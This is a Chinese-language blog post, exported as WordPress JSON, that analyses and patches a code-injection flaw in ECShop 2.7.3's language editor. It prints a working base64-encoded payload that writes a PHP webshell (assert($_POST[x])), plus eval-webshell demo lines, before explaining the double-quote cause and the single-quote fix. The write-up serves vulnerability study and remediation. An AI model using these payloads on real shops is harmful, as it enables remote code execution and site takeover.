{"id":199483,"date":"2025-05-03T10:52:40","date_gmt":"2025-05-03T02:52:40","guid":{"rendered":"https:\/\/server.hk\/cnblog\/199483\/"},"modified":"2025-05-03T10:52:40","modified_gmt":"2025-05-03T02:52:40","slug":"ecshop%e8%af%ad%e8%a8%80%e9%a1%b9%e5%ba%93%e6%b3%a8%e5%85%a5%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90%e5%92%8c%e4%bf%ae%e5%a4%8d","status":"publish","type":"post","link":"https:\/\/server.hk\/cnblog\/199483\/","title":{"rendered":"ECSHOP\u8bed\u8a00\u9879\u5e93\u6ce8\u5165\u6f0f\u6d1e\u5206\u6790\u548c\u4fee\u590d"},"content":{"rendered":"

1.ECSHOP\u8bed\u8a00\u5e93\u6ce8\u5165\u6f0f\u6d1e\u5229\u7528<\/h3>\n

1) \u767b\u9646\u5230ecshop\u53f0\u540e\uff0c\u9009\u62e9\u6a21\u677f\u7ba1\u7406\uff0c\u8bed\u8a00\u9879\u7f16\u8f91\uff0c\u641c\u7d22\u201c\u7528\u6237\u4fe1\u606f\u201d<\/p>\n

<\/p>\n

\u4e3a\u4ec0\u4e48\u8981\u641c\u7d22\u201c\u7528\u6237\u4fe1\u606f\u201d\uff0c\u8fd8\u53ef\u4ee5\u641c\u7d22\u5176\u5b83\u7684\u5417\uff1f<\/p>\n

\u7b54\u6848\u662f\u641c\u7d22languages\\zh_cn\\user.php\u6587\u4ef6\u91cc\u4efb\u4f55\u4e00\u4e2a\u53d8\u91cf\u90fd\u53ef\u4ee5<\/p>\n

<\/p>\n

2) \u6dfb\u52a0\u5982\u4e0b\u540e\u95e8\uff0c\u5c06\u7528\u6237\u4fe1\u606f\u6539\u4e3a<\/p>\n

\r\n\u7528\u6237\u4fe1\u606f${${fputs(fopen(base64_decode(Sm95Q2hvdS5waHA),w),base64_decode(PD9waHAKYXNzZXJ0KAokX1BPU1RbeF0KKTsKPz4))}}<\/pre>\n
 \u5373\u751f\u6210\u4e00\u4e2aJoyChou.php\u6587\u4ef6\uff0c\u5185\u5bb9\u4e3a\uff1a<\/p>\n
\r\n<?php\r\nassert(\r\n$_POST[x]\r\n);\r\n?><\/pre>\n
 <\/p>\n
 3) \u8bbf\u95eeuser.php\u5373\u53ef\u4ea7\u751fshell\uff08\u4e0d\u7528\u6ce8\u518c\u767b\u5f55\u8d26\u6237\uff09<\/p>\n
\r\nhttp:\/\/localhost\/ECShop_V2.7.3_UTF8_release0411\/user.php\r\n\u6216\r\nhttp:\/\/localhost\/ECShop_V2.7.3_UTF8_release0411\/languages\/zh_cn\/user.php<\/pre>\n
 <\/p>\n
 2.\u4ea7\u751f\u539f\u56e0<\/h3>\n
 \u5728admin\\edit_languages.php\u6587\u4ef6\u4e2d\u7b2c120\u884c\uff0c\u4fee\u6539\u53d8\u91cf\u5185\u5bb9\uff0c\u6ce8\u610f\u662f\u7528\u7684\u53cc\u5f15\u53f7\u3002<\/p>\n
      <\/p>\n
\r\n for ($i = 0; $i < count($_POST['item_id']); $i++)\r\n    {\r\n        \/* \u8bed\u8a00\u9879\u5185\u5bb9\u5982\u679c\u4e3a\u7a7a\uff0c\u4e0d\u4fee\u6539 *\/\r\n        if (trim($_POST['item_content'][$i]) == '')\r\n        {\r\n            unset($src_items[$i]);\r\n        }\r\n        else\r\n        {\r\n            $_POST['item_content'][$i] = str_replace('\\\\\\\\n', '\\\\n', $_POST['item_content'][$i]);\r\n            \/* $_POST['item_content'][$i]\u662f\u4fee\u6539\u540e\u589e\u52a0\u7684\u5185\u5bb9\uff0c\u5373\u589e\u52a0\u7684\"\u7528\u6237\u4fe1\u606f${${fputs(fopen\"\u7b49\u5185\u5bb9\r\n               $dst_items[$i] \u662f $_LANG['label_profile'] = \"\u7528\u6237\u4fe1\u606f${${fputs(fopen\"; \r\n            *\/\r\n            $dst_items[$i] = $_POST['item_id'][$i] .' = '. '\"' .$_POST['item_content'][$i]. '\";';\r\n        }\r\n    }<\/pre>\n
      <\/p>\n
 \u4fee\u6539\u5b8c\u540e\u6587\u4ef6\\languages\\zh_cn\\user.php\u53d8\u91cf\u4e3a\uff1a\u6ce8\u610f\u662f\u53cc\u5f15\u53f7\u54e6<\/p>\n
\r\n$_LANG['label_profile'] = \"\u7528\u6237\u4fe1\u606f${${fputs(fopen(base64_decode(Sm95Q2hvdS5waHA),w),base64_decode(PD9waHAKYXNzZXJ0KAokX1BPU1RbeF0KKTsKPz4))}}\";<\/pre>\n
 <\/p>\n
 \u7531\u4e8e\u662f\u53cc\u5f15\u53f7\uff0c\u6240\u4ee5\u53ea\u8981\u5728\u4efb\u610f\u7684php\u6587\u4ef6\u4e2d\u5f15\u7528\u8fd9\u4e2a\u53d8\u91cf\uff0c\u4ee3\u7801\u5c31\u4f1a\u6210\u529f\u6267\u884c\u3002<\/p>\n
 \u81f3\u4e8e\u4e3a\u4ec0\u4e48\u53ef\u4ee5\u6267\u884c\uff1f\u539f\u7406\u5982\u4e0b\uff1a<\/p>\n
 \u4e0b\u9762\u8fd9\u4e09\u53e5\u8bdd\u90fd\u53ef\u4ee5\u6267\u884c\uff0c\u4e0e\u5176\u8bf4\u4ee3\u7801\u6267\u884c\uff0c\u4e0d\u5982\u8bf4\u53c2\u6570\u6267\u884c\u3002<\/p>\n
\r\n<?php \r\n$a = \"${ phpinfo()}\";  \/\/ \u6709\u4e00\u4e2a\u7a7a\u683c\r\n$b = \"{${phpinfo()}}\"; \/\/ \u591a\u4e00\u5bf9{}\uff0c\u4f46\u662f\u6ca1\u6709\u7a7a\u683c\r\n$c = \"{${fputs(fopen(\"JoyChou.php\", \"w+\"), \"<?php eval(\\$_POST[1]);?>\")}}\";\r\n$d = \"asdf{${phpinfo()}}\"; \/\/ {\u5b57\u7b26\u524d\u53ef\u4ee5\u968f\u610f\u52a0\u5b57\u7b26\u4e32\r\n?><\/pre>\n
 \u800chttp:\/\/localhost\/ECShop_V2.7.3_UTF8_release0411\/user.php\u8fd9\u4e2a\u6587\u4ef6\u5305\u542b\\languages\\zh_cn\\user.php \u8fd9\u4e2a\u6587\u4ef6\uff0c\u6240\u4ee5\u4e5f\u53ef\u4ee5\u4ee3\u7801\u6267\u884c\u3002<\/p>\n
\r\n\/* \u8f7d\u5165\u8bed\u8a00\u6587\u4ef6 *\/\r\nrequire_once(ROOT_PATH . 'languages\/' .$_CFG['lang']. '\/user.php');<\/pre>\n
 3\u6f0f\u6d1e\u4fee\u590d<\/h3>\n
 \u4e86\u89e3\u4e86\u6f0f\u6d1e\u539f\u7406\u540e\uff0c\u4fee\u590d\u5c31\u662f\u4e00\u4ef6\u6bd4\u8f83\u7b80\u5355\u7684\u4e8b\u60c5\uff0c\u53ea\u9700\u5c06\u53cc\u5f15\u53f7\u6539\u4e3a\u5355\u5f15\u53f7<\/p>\n
 \u4fee\u6539\\admin\\edit_languages.php<\/p>\n
\r\n\/\/ \u4fee\u590d\u524d\r\n$dst_items[$i] = $_POST['item_id'][$i] .' = '. '\"' .$_POST['item_content'][$i]. '\";';  \r\n\/\/ \u4fee\u590d\u540e\uff0c\u7531\u4e8e\u60f3\u5728\u5355\u5f15\u53f7\u4e4b\u95f4\u51fa\u73b0\u5355\u5f15\u53f7\uff0c\u5fc5\u987b\u4f7f\u7528\u8f6c\u4e49\u3002\r\n$dst_items[$i] = $_POST['item_id'][$i] .' = '. '\\'' .$_POST['item_content'][$i]. '\\';';<\/pre>\n
 \u518d\u6b21\u8bbf\u95eehttp:\/\/localhost\/ECShop_V2.7.3_UTF8_release0411\/user.php\u5df2\u7ecf\u4e0d\u80fd\u751f\u6210JoyChou.php\uff0c\u4ee3\u7801\u6ca1\u80fd\u5f97\u5230\u6267\u884c\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"
1.ECSHOP\u8bed\u8a00\u5e93\u6ce8\u5165\u6f0f\u6d1e\u5229...<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4925],"tags":[],"class_list":["post-199483","post","type-post","status-publish","format-standard","hentry","category-4925"],"_links":{"self":[{"href":"https:\/\/server.hk\/cnblog\/wp-json\/wp\/v2\/posts\/199483","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/server.hk\/cnblog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/server.hk\/cnblog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/server.hk\/cnblog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/server.hk\/cnblog\/wp-json\/wp\/v2\/comments?post=199483"}],"version-history":[{"count":0,"href":"https:\/\/server.hk\/cnblog\/wp-json\/wp\/v2\/posts\/199483\/revisions"}],"wp:attachment":[{"href":"https:\/\/server.hk\/cnblog\/wp-json\/wp\/v2\/media?parent=199483"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/server.hk\/cnblog\/wp-json\/wp\/v2\/categories?post=199483"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/server.hk\/cnblog\/wp-json\/wp\/v2\/tags?post=199483"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}